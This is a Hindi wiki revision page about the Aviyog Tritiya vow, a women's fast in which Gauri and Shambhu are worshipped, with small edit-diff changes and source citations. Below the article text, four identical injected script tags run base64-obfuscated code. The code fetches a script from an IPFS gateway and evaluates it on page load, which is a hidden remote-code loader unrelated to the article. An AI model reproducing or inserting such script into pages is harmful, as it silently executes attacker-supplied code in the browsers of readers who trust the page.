Difference between revisions of "अवियोग तृतीया"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (अवियोगव्रत का नाम बदलकर अवियोग तृतीया कर दिया गया है)
m (Text replace - ")</ref" to "</ref")
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*अवियोगव्रत स्त्रियों के लिए हैं।
 
*अवियोगव्रत स्त्रियों के लिए हैं।
 
*अवियोगव्रत [[मार्गशीर्ष]] [[शुक्ल पक्ष]] की [[द्वितीया]] के प्रारम्भ में आता है।
 
*अवियोगव्रत [[मार्गशीर्ष]] [[शुक्ल पक्ष]] की [[द्वितीया]] के प्रारम्भ में आता है।
Line 5: Line 5:
 
*अवियोग तृतीया को खीर खाना व [[गौरी]] एवं [[शम्भू]] की पूजा की पूजा की जाती है।
 
*अवियोग तृतीया को खीर खाना व [[गौरी]] एवं [[शम्भू]] की पूजा की पूजा की जाती है।
 
*अवियोग व्रत एक वर्ष तक रखना चाहिये।
 
*अवियोग व्रत एक वर्ष तक रखना चाहिये।
* बारह मासों में विभिन्न फूलों के साथ विभिन्न नामों से चावल के आटे से बनी गौरी एवं शम्भू की प्रतिमाओं की पूजा करनी चाहिए। <ref>कृत्यकल्पतरु (व्रत 70-75); हेमाद्रि व्रत (1, 439-444); कृत्यरत्नाकर (455); भविष्योत्तर पुराण (22)</ref>
+
* बारह मासों में विभिन्न फूलों के साथ विभिन्न नामों से चावल के आटे से बनी गौरी एवं शम्भू की प्रतिमाओं की पूजा करनी चाहिए। <ref>कृत्यकल्पतरु (व्रत 70-75); हेमाद्रि व्रत (1, 439-444); कृत्यरत्नाकर (455); भविष्योत्तर पुराण (22</ref>
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:38, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • aviyogavrat striyoan ke lie haian.
  • aviyogavrat margashirsh shukl paksh ki dvitiya ke prarambh mean ata hai.
  • aviyogavrat ko aviyog tritiya ke nam se bhi jana jata hai.
  • aviyog tritiya ko khir khana v gauri evan shambhoo ki pooja ki pooja ki jati hai.
  • aviyog vrat ek varsh tak rakhana chahiye.
  • barah masoan mean vibhinn phooloan ke sath vibhinn namoan se chaval ke ate se bani gauri evan shambhoo ki pratimaoan ki pooja karani chahie. [1]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. krityakalpataru (vrat 70-75); hemadri vrat (1, 439-444); krityaratnakar (455); bhavishyottar puran (22

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>